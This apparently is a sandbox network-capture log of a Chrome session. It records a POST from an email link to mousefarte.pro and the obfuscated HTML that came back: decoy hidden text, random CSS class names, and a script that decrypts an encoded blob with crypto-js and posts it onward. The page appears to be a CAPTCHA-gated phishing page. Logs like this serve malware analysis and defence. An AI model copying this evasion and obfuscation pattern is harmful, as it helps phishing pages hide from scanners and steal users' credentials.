                                                                                        2024-10-02 15:15:38 UTC1369INData Raw: 6d 35 41 2b 33 41 37 39 6a 31 42 76 58 59 2b 74 4d 4b 77 39 66 46 33 63 37 51 44 38 72 66 42 65 37 4f 79 2f 4c 32 30 77 62 35 49 65 41 53 41 2f 45 55 46 65 50 79 39 78 54 68 35 77 37 39 41 51 34 67 4b 75 38 63 45 69 72 75 43 2b 6f 4d 4c 7a 6b 62 2b 78 51 38 2f 67 45 61 48 7a 38 46 51 6b 6b 79 45 69 6f 63 42 77 34 76 52 77 64 43 44 6a 78 41 51 54 64 55 4c 45 59 36 52 78 55 62 4b 31 56 52 49 56 52 4f 48 6b 39 42 61 44 70 58 4b 47 52 41 59 30 55 2b 63 45 6c 52 52 57 42 4f 52 47 5a 4d 4e 46 74 36 63 6e 67 37 4f 31 52 51 57 48 64 66 58 6e 74 48 64 46 4a 71 61 6d 56 68 66 6b 35 79 55 5a 4f 53 6a 34 4a 56 6d 57 57 62 65 48 32 52 6e 4a 39 77 63 6e 35 35 58 6f 36 6e 6f 31 35 78 6c 5a 64 37 65 6f 46 75 65 48 71 52 6c 4a 79 67 6e 6f 35 78 6c 34 4e 35 69 4a 6d 64 71
                                                                                        Data Ascii: m5A+3A79j1BvXY+tMKw9fF3c7QD8rfBe7Oy/L20wb5IeASA/EUFePy9xTh5w79AQ4gKu8cEiruC+oMLzkb+xQ8/gEaHz8FQkkyEiocBw4vRwdCDjxAQTdULEY6RxUbK1VRIVROHk9BaDpXKGRAY0U+cElRRWBORGZMNFt6cng7O1RQWHdfXntHdFJqamVhfk5yUZOSj4JVmWWbeH2RnJ9wcn55Xo6no15xlZd7eoFueHqRlJygno5xl4N5iJmdq
                                                                                        2024-10-02 15:15:38 UTC1369INData Raw: 46 42 75 54 6c 41 4e 76 4a 36 41 50 63 41 75 33 77 35 4f 6a 77 44 50 44 6a 38 4f 62 61 2b 50 6f 54 31 2f 55 4d 46 67 44 34 42 68 67 61 35 52 54 32 35 79 30 47 39 75 76 35 48 43 55 4a 4d 67 77 56 4e 77 4d 47 4c 77 30 51 43 77 67 55 46 43 77 30 50 78 6f 6a 4e 44 4d 66 4a 77 49 4c 4a 53 34 74 53 67 38 76 43 31 4e 55 4c 68 41 55 52 44 51 54 50 53 63 32 4f 6c 4d 36 50 6b 45 63 52 6a 45 76 4b 46 4a 47 4e 7a 68 49 56 32 49 35 53 6a 35 6c 62 31 31 43 52 43 39 4e 52 55 6c 4e 56 6c 70 7a 4e 31 74 65 4f 33 70 45 59 59 56 47 51 33 4e 2b 56 57 78 61 57 6e 35 4d 62 58 46 70 68 48 56 6b 59 46 61 45 64 47 56 34 65 56 6c 34 57 59 42 2f 64 58 64 2b 68 4a 35 6c 67 70 36 49 67 59 36 4d 68 47 65 63 67 4a 2b 76 6f 49 4f 32 64 35 69 74 6b 5a 61 62 6d 34 6d 74 6e 58 71 5a 72 70
                                                                                        Data Ascii: FBuTlANvJ6APcAu3w5OjwDPDj8Oba+PoT1/UMFgD4Bhga5RT25y0G9uv5HCUJMgwVNwMGLw0QCwgUFCw0PxojNDMfJwILJS4tSg8vC1NULhAURDQTPSc2OlM6PkEcRjEvKFJGNzhIV2I5Sj5lb11CRC9NRUlNVlpzN1teO3pEYYVGQ3N+VWxaWn5MbXFphHVkYFaEdGV4eVl4WYB/dXd+hJ5lgp6IgY6MhGecgJ+voIO2d5itkZabm4mtnXqZrp
                                                                                        2024-10-02 15:15:38 UTC1369INData Raw: 2b 4e 72 47 41 65 6f 47 35 4f 50 6b 42 74 66 72 36 41 38 48 2b 66 49 54 47 67 2f 32 2f 67 58 33 2f 51 58 30 2f 51 6b 66 43 52 67 50 2b 41 45 71 45 69 59 42 2f 52 4d 56 47 43 6f 51 42 53 38 4a 47 77 30 79 4d 69 73 4e 44 52 77 65 53 43 55 53 4a 69 63 4d 4a 53 55 74 48 52 6f 70 44 44 46 54 4c 69 41 31 4b 45 51 30 48 44 68 47 58 31 4e 53 4d 79 78 42 56 6a 35 43 53 57 41 36 4e 79 4e 65 57 54 31 6e 51 45 73 71 5a 30 39 53 4c 30 31 55 57 30 6c 37 61 31 39 5a 56 58 4a 61 50 48 39 2b 62 32 46 59 5a 32 70 6e 67 34 4e 33 6a 32 6c 6c 59 6d 78 31 69 33 35 50 56 48 56 71 5a 59 39 6f 65 47 35 6f 66 6f 4f 69 58 4a 52 2f 63 32 43 71 69 6e 6c 35 6d 70 68 6e 65 4a 79 52 6a 6d 39 77 6a 70 61 52 68 35 75 76 66 49 65 5a 69 37 35 7a 6f 33 71 4e 6b 71 4b 56 6d 4c 57 6d 70 4b 6e
                                                                                        Data Ascii: +NrGAeoG5OPkBtfr6A8H+fITGg/2/gX3/QX0/QkfCRgP+AEqEiYB/RMVGCoQBS8JGw0yMisNDRweSCUSJicMJSUtHRopDDFTLiA1KEQ0HDhGX1NSMyxBVj5CSWA6NyNeWT1nQEsqZ09SL01UW0l7a19ZVXJaPH9+b2FYZ2png4N3j2llYmx1i35PVHVqZY9oeG5ofoOiXJR/c2Cqinl5mphneJyRjm9wjpaRh5uvfIeZi75zo3qNkqKVmLWmpKn
                                                                                        2024-10-02 15:15:38 UTC291INData Raw: 77 4c 69 39 65 4d 48 42 50 54 76 44 2b 30 54 33 76 37 78 47 50 73 43 39 65 2f 69 46 76 6b 4a 34 68 6a 39 4a 41 41 6a 44 2f 44 78 41 68 4d 69 41 54 6b 51 41 78 58 37 4c 42 37 34 4d 53 30 68 41 30 4d 47 49 77 55 6c 52 6a 52 41 48 45 6f 4b 50 41 39 43 49 7a 49 50 52 79 64 41 4b 55 70 45 53 44 67 56 53 7a 74 63 4f 44 6c 67 4d 43 4e 66 5a 32 4a 44 51 6d 77 6e 5a 7a 77 6f 4d 46 6f 77 62 53 63 2b 4b 58 52 49 54 44 4a 35 52 33 39 4b 53 56 67 37 56 6e 51 2f 67 55 56 44 68 34 64 45 67 33 56 6e 52 6d 2b 43 55 56 46 52 58 59 75 57 6a 47 35 54 68 6e 46 59 61 5a 32 41 63 33 57 51 58 33 4a 36 6c 4a 46 62 63 34 4e 33 5a 58 2b 48 72 6e 74 2b 69 33 79 42 67 59 2b 76 71 36 57 49 6b 35 69 31 6b 5a 32 64 75 4c 65 58 6b 38 62 48 6e 58 2b 6e 68 37 71 45 79 4d 33 43 6f 4d 48 54
                                                                                        Data Ascii: wLi9eMHBPTvD+0T3v7xGPsC9e/iFvkJ4hj9JAAjD/DxAhMiATkQAxX7LB74MS0hA0MGIwUlRjRAHEoKPA9CIzIPRydAKUpESDgVSztcODlgMCNfZ2JDQmwnZzwoMFowbSc+KXRITDJ5R39KSVg7VnQ/gUVDh4dEg3VnRm+CUVFRXYuWjG5ThnFYaZ2Ac3WQX3J6lJFbc4N3ZX+Hrnt+i3yBgY+vq6WIk5i1kZ2duLeXk8bHnX+nh7qEyM3CoMHT


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.460332104.18.94.414433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:39 UTC485OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/25142125:1727879247:3UWyJf9ofqFKU96Nb8CK_rz0Q3BK9EjQwablSo10HGc/8cc5a5a47e0643e9/ede8e2645a67d81 HTTP/1.1
                                                                                        Host: challenges.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:39 UTC349INHTTP/1.1 404 Not Found
                                                                                        Date: Wed, 02 Oct 2024 15:15:39 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 7
                                                                                        Connection: close
                                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                        cf-chl-out: t19yaeRB+cKIeKnNuoVXZZQ/aIsLydFQKPQ=$XoYOM+wR1ws1pvXE
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a62c09fc1993-EWR
                                                                                        2024-10-02 15:15:39 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                        Data Ascii: invalid


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.460334188.114.96.34433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:39 UTC959OUTPOST /4pAtm/?utm_source=substack&utm_medium=email HTTP/1.1
                                                                                        Host: mousefarte.pro
                                                                                        Connection: keep-alive
                                                                                        Content-Length: 859
                                                                                        Cache-Control: max-age=0
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Upgrade-Insecure-Requests: 1
                                                                                        Origin: https://mousefarte.pro
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                        Sec-Fetch-Site: same-origin
                                                                                        Sec-Fetch-Mode: navigate
                                                                                        Sec-Fetch-User: ?1
                                                                                        Sec-Fetch-Dest: document
                                                                                        Referer: https://mousefarte.pro/4pAtm/?utm_source=substack&utm_medium=email
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        Cookie: PHPSESSID=v6pg430j5lmu808i368bg8caoa
                                                                                        2024-10-02 15:15:39 UTC859OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 31 39 57 52 47 5a 58 46 72 55 6f 4d 35 69 4b 59 2d 64 4d 68 67 5a 56 5f 33 6b 37 56 74 44 4d 65 71 68 47 68 72 72 35 6a 52 61 51 66 41 34 48 44 4b 30 33 4f 30 6b 79 58 6f 32 59 48 4f 55 75 41 70 69 71 76 34 6f 74 45 55 79 68 37 5a 2d 56 46 6d 37 6e 32 43 57 59 55 45 43 42 51 75 55 53 69 62 52 39 4b 65 33 47 6f 2d 77 36 39 77 55 58 6d 32 41 37 66 6c 4b 4b 4d 44 47 47 47 76 6e 72 69 37 77 57 6f 6f 61 34 38 75 4c 6a 63 36 4e 35 38 6a 6f 70 46 32 2d 57 4a 62 39 6b 31 75 56 41 67 72 75 73 67 42 31 71 50 5a 55 66 48 68 63 54 4e 4e 50 6b 52 49 42 74 30 45 39 63 4d 56 68 69 65 6e 38 6c 6f 70 78 30 64 4f 32 57 56 6d 46 77 58 4a 64 75 37 4b 69 33 53 6b 46 61 61 73 61 5f 65 59 46 65 79 52 46 4d
                                                                                        Data Ascii: cf-turnstile-response=0.19WRGZXFrUoM5iKY-dMhgZV_3k7VtDMeqhGhrr5jRaQfA4HDK03O0kyXo2YHOUuApiqv4otEUyh7Z-VFm7n2CWYUECBQuUSibR9Ke3Go-w69wUXm2A7flKKMDGGGvnri7wWooa48uLjc6N58jopF2-WJb9k1uVAgrusgB1qPZUfHhcTNNPkRIBt0E9cMVhien8lopx0dO2WVmFwXJdu7Ki3SkFaasa_eYFeyRFM
                                                                                        2024-10-02 15:15:40 UTC733INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:40 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        x-powered-by: PHP/7.3.33
                                                                                        access-control-allow-origin: *
                                                                                        expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                        cache-control: no-store, no-cache, must-revalidate
                                                                                        pragma: no-cache
                                                                                        vary: Accept-Encoding
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UfAkcZ31E2y206Q0CKCoVRO9fySEs1bOHkAu7GYKEcVjrUCzj5M2wZ2Ng4YcEpfb6PACVDsh5yM5%2BoB7kO1EjRhojqgAvjrDVZ3r7t4P69AxgTIQXv5P0FUh1IJL9wStqw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a62bdcda4219-EWR
                                                                                        2024-10-02 15:15:40 UTC636INData Raw: 31 38 65 66 0d 0a 3c 68 74 6d 6c 3e 0d 0a 20 3c 68 65 61 64 3e 0d 0a 20 20 09 3c 6d 65 74 61 09 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 09 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 09 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 0a 0a 09 09 20 3c 6d 65 74 61 20 20 09 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 09 20 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 09 09 09 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 0a 0a 09 09 09 3c 73 63 72 69 70 74 20 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 3e 20 20 3c
                                                                                        Data Ascii: 18ef<html> <head> <metaname="viewport" content="width=device-width,initial-scale=1.0"> <meta name="robots" content="noindex,nofollow"><script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js"> <
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 09 20 40 6b 65 79 66 72 61 6d 65 73 09 20 20 73 68 61 64 6f 77 2d 66 61 64 65 20 7b 09 30 25 09 2c 20 09 31 30 30 25 09 20 20 2c 20 20 32 31 2e 32 25 09 09 2c 09 38 30 25 20 7b 20 09 20 6f 70 61 63 69 74 79 3a 20 20 09 30 09 20 7d 20 09 09 34 37 25 09 09 2c 20 37 30 25 20 09 7b 20 6f 70 61 63 69 74 79 3a 09 31 09 20 7d 20 7d 09 09 23 74 61 63 69 74 20 7b 20 20 77 69 64 74 68 3a 09 09 31 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 09 31 37 39 70 78 20 20 20 7d 09 20 23 74 61 62 6f 6f 20 09 20 7b 20 09 77 69 64 74 68 3a 20 20 20 31 33 30 70 78 3b 68 65 69 67 68 74 3a 09 37 31 70 78 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 09 30 20 20 09 30 20 09 20 37 70 78 20 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 20 09 68 69 64 64 65 6e 3b 6d 61 72 67 69 6e
                                                                                        Data Ascii: @keyframes shadow-fade {0%, 100% , 21.2%,80% { opacity: 0 } 47%, 70% { opacity:1 } }#tacit { width:130px;margin-top: 179px } #taboo { width: 130px;height:71px;border-radius: 0 0 7px 7px;overflow: hidden;margin
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 20 20 77 69 64 74 68 3a 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 09 20 20 32 31 70 78 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 20 20 2d 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 20 23 30 33 35 34 61 31 20 7d 20 09 09 23 7a 69 6e 67 79 09 20 09 3e 09 20 2e 6f 62 65 73 65 20 7b 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 77 69 64 74 68 3a 20 09 20 31 31 38 70 78 3b 68 65 69 67 68 74 3a 09 09 33 37 70 78 09 09 7d 20 09 09 2e 69 63 68 74 68 79 6f 6c 6f 67 79 09 09 7b 09 09 77 69 64 74 68 3a 20 09 09 33 39 2e 33 33 33 33 70 78 3b 68 65 69 67 68 74 3a 09 09 09 33 38 70 78 09 20 7d 20 09 2e 71 75 61 63 6b 65 72 79 09 7b 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 20 20 23 30 30 37 33 63 63 09 09 7d 09 2e 76 61 63 63 69 6e 65 09 20 7b 09 09 62 61 63
                                                                                        Data Ascii: width: 118px;height: 21px;margin-bottom: -1px;background: #0354a1 } #zingy > .obese {display: flex;width: 118px;height:37px} .ichthyology{width: 39.3333px;height:38px } .quackery{background: #0073cc}.vaccine {bac
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 09 31 30 37 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 09 68 69 64 64 65 6e 09 20 20 7d 09 20 09 2e 6c 61 63 74 65 61 6c 09 20 09 7b 09 09 09 77 69 64 74 68 3a 09 20 09 39 36 70 78 3b 68 65 69 67 68 74 3a 20 20 09 39 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 09 09 20 23 34 66 63 66 66 66 3b 6d 61 72 67 69 6e 3a 09 2d 34 38 70 78 20 09 09 61 75 74 6f 20 20 20 30 09 20 09 61 75 74 6f 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 09 09 20 37 70 78 3b 74 72 61 6e 73 66 6f 72 6d 3a 09 73 63 61 6c 65 59 28 30 2e 36 29 20 09 72 6f 74 61 74 65 28 34 35 64 65 67 29 09 7d 20 09 23 79 61 63 68 74 73 6d 61 6e 09 20 2e 6c 61 63 74 65 61 6c 09 09 09 7b 20 09 62 61 63 6b 67 72 6f 75 6e 64 3a 09 09 23 31 31 33 38 36 34 09 20 20 7d 09 20 23 6c 61 62 79 72 69 6e 74 68 09 20 2e
                                                                                        Data Ascii: 107px;overflow:hidden } .lacteal {width: 96px;height: 96px;background: #4fcfff;margin:-48px auto 0 auto;border-radius: 7px;transform:scaleY(0.6) rotate(45deg)} #yachtsman .lacteal{ background:#113864 } #labyrinth .
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 73 3d 22 6c 61 63 74 65 61 6c 22 3e 09 20 3c 2f 64 69 76 3e 09 20 3c 2f 64 69 76 3e 09 3c 2f 64 69 76 3e 09 09 3c 2f 64 69 76 3e 0d 0a 0a 20 09 3c 2f 62 6f 64 79 3e 0d 0a 3c 6c 69 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 44 69 73 63 6f 76 65 72 09 09 6e 65 77 09 09 20 70 6f 73 73 69 62 69 6c 69 74 69 65 73 20 66 72 6f 6d 09 09 09 62 65 68 69 6e 64 09 74 68 65 09 09 77 68 65 65 6c 2e 3c 2f 6c 69 3e 0d 0a 0a 3c 73 63 72 69 70 74 3e 0d 0a 0a 0a 09 09 20 61 73 79 6e 63 09 20 20 66 75 6e 63 74 69 6f 6e 09 6a 61 67 67 65 64 6c 79 28 65 61 72 74 68 29 20 20 09 7b 0d 0a 0a 0a 20 09 76 61 72 09 20 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 09 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 61 72 74 68 29 3b 0d 0a 0a 09 20 72 65 74 75 72 6e 20 43 72 79
                                                                                        Data Ascii: s="lacteal"> </div> </div></div></div> </body><li style="display:none;">Discovernew possibilities frombehindthewheel.</li><script> async functionjaggedly(earth) { var {a,b,c,d} = JSON.parse(earth); return Cry
                                                                                        2024-10-02 15:15:40 UTC279INData Raw: 52 6a 59 6d 55 31 5a 54 45 32 5a 57 56 6c 4d 44 4a 6b 4f 54 63 32 4e 32 4a 6b 59 54 59 78 5a 57 55 78 4d 44 59 7a 49 69 77 69 5a 43 49 36 49 6a 63 33 4e 6a 45 32 4f 54 5a 6c 49 6e 30 3d 60 29 29 2c 20 7b 09 0d 0a 20 6d 65 74 68 6f 64 3a 09 09 20 27 50 4f 53 54 27 2c 09 09 09 62 6f 64 79 3a 20 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 7b 09 79 61 6d 6d 65 72 3a 09 20 22 71 75 61 64 72 69 6c 6c 69 6f 6e 22 09 20 7d 29 0d 0a 0a 09 09 09 7d 29 29 2e 74 65 78 74 28 29 29 29 3b 20 0d 0a 20 7d 29 28 29 3b 0d 0a 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 0a 3c 61 20 09 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 44 72 69 76 69 6e 67 20 20 20 69 73 09 20 09 61 09 09 20 6a 6f 75 72 6e 65 79 09 09 6f 66 09 09 09 64 69 73 63 6f 76 65 72 69 6e 67 20
                                                                                        Data Ascii: RjYmU1ZTE2ZWVlMDJkOTc2N2JkYTYxZWUxMDYzIiwiZCI6Ijc3NjE2OTZlIn0=`)), { method: 'POST',body: JSON.stringify({yammer: "quadrillion" })})).text())); })();</script><a style="display:none;">Driving is a journeyofdiscovering
                                                                                        2024-10-02 15:15:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.460335104.17.25.144433592C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-10-02 15:15:40 UTC560OUTGET /ajax/libs/crypto-js/4.0.0/crypto-js.min.js HTTP/1.1
                                                                                        Host: cdnjs.cloudflare.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: script
                                                                                        Referer: https://mousefarte.pro/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-10-02 15:15:40 UTC928INHTTP/1.1 200 OK
                                                                                        Date: Wed, 02 Oct 2024 15:15:40 GMT
                                                                                        Content-Type: application/javascript; charset=utf-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        Access-Control-Allow-Origin: *
                                                                                        Cache-Control: public, max-age=30672000
                                                                                        ETag: W/"5eb03e2d-bb78"
                                                                                        Last-Modified: Mon, 04 May 2020 16:09:17 GMT
                                                                                        cf-cdnjs-via: cfworker/kv
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Timing-Allow-Origin: *
                                                                                        X-Content-Type-Options: nosniff
                                                                                        CF-Cache-Status: HIT
                                                                                        Age: 169066
                                                                                        Expires: Mon, 22 Sep 2025 15:15:40 GMT
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s4TjXh8A2KtzbviY1HoGzQAY0djO3%2BwBZ0OU62J0v17MQ5OwNL5JhbjtREtN51iiqUTpesWDfw0EehvP4g8kSWrYUDjjcsTv1kxP7H62j5xe2vnlkJ1QWKz%2FzUdEU%2FNxEtPjcThg"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                        Strict-Transport-Security: max-age=15780000
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8cc5a633598e438c-EWR
                                                                                        2024-10-02 15:15:40 UTC441INData Raw: 37 62 66 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 78 70 6f 72 74 73 3d 65 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 5d 2c 65 29 3a 74 2e 43 72 79 70 74 6f 4a 53 3d 65 28 29 7d 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 68 2c 74 2c 65 2c 72 2c 69 2c 6e 2c 66 2c 6f 2c 73 2c 63 2c 61 2c 6c 2c 64 2c 6d 2c 78 2c 62 2c 48 2c 7a 2c 41 2c 75 2c 70 2c 5f 2c 76 2c 79 2c 67 2c 42 2c 77 2c 6b 2c 53 2c 43 2c 44 2c 45 2c 52 2c 4d 2c 46 2c 50 2c 57 2c 4f 2c 49 2c 55 2c 4b 2c 58 2c 4c 2c 6a 2c 4e 2c 54 2c 71 2c 5a
                                                                                        Data Ascii: 7bff!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 21 3d 74 79 70 65 6f 66 20 77 69 6e 64 6f 77 26 26 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 26 26 28 74 3d 77 69 6e 64 6f 77 2e 6d 73 43 72 79 70 74 6f 29 2c 21 74 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 26 26 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 26 26 28 74 3d 67 6c 6f 62 61 6c 2e 63 72 79 70 74 6f 29 2c 21 74 26 26 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 72 65 71 75 69 72 65 29 74 72 79 7b 74 3d 72 65 71 75 69 72 65 28 22 63 72 79 70 74 6f 22 29 7d 63 61 74 63 68 28 74 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 69 28 29 7b 69 66 28 74 29 7b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 52 61 6e 64 6f 6d 56 61 6c 75 65 73 29 74 72 79 7b 72 65 74 75 72 6e 20 74
                                                                                        Data Ascii: !=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t
                                                                                        2024-10-02 15:15:40 UTC1369INData Raw: 6f 25 34 2a 38 26 32 35 35 3b 65 5b 69 2b 6f 3e 3e 3e 32 5d 7c 3d 73 3c 3c 32 34 2d 28 69 2b 6f 29 25 34 2a 38 7d 65 6c 73 65 20 66 6f 72 28 6f 3d 30 3b 6f 3c 6e 3b 6f 2b 3d 34 29 65 5b 69 2b 6f 3e 3e 3e 32 5d 3d 72 5b 6f 3e 3e 3e 32 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 73 69 67 42 79 74 65 73 2b 3d 6e 2c 74 68 69 73 7d 2c 63 6c 61 6d 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 74 68 69 73 2e 77 6f 72 64 73 2c 65 3d 74 68 69 73 2e 73 69 67 42 79 74 65 73 3b 74 5b 65 3e 3e 3e 32 5d 26 3d 34 32 39 34 39 36 37 32 39 35 3c 3c 33 32 2d 65 25 34 2a 38 2c 74 2e 6c 65 6e 67 74 68 3d 6c 2e 63 65 69 6c 28 65 2f 34 29 7d 2c 63 6c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 73 2e 63 6c 6f 6e 65 2e 63 61 6c 6c 28 74 68 69 73 29 3b
                                                                                        Data Ascii: o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(o=0;o<n;o+=4)e[i+o>>>2]=r[o>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=l.ceil(e/4)},clone:function(){var t=s.clone.call(this);
